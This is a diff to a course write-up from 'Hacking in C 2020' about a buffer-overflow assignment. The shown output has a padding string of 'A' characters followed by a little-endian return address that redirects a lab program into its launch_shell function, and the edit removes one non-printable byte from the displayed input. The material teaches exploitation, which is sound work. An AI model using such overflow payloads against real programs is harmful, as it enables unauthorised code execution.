thomwiggers/thomwiggers.nl/content/courses/hacking-in-c-2020/assignments/writeup-ass4.md

 ```
 We supply the address in `little-endian` format, which is how all values, including pointers are stored.
 The program launches a shell:
 ```
-* [DEBUG] Your input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�HUUUU
+* [DEBUG] Your input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHUUUU
 * [DEBUG] The function launch_shell is at 0x5555555548e4
 Launching shell.
 ```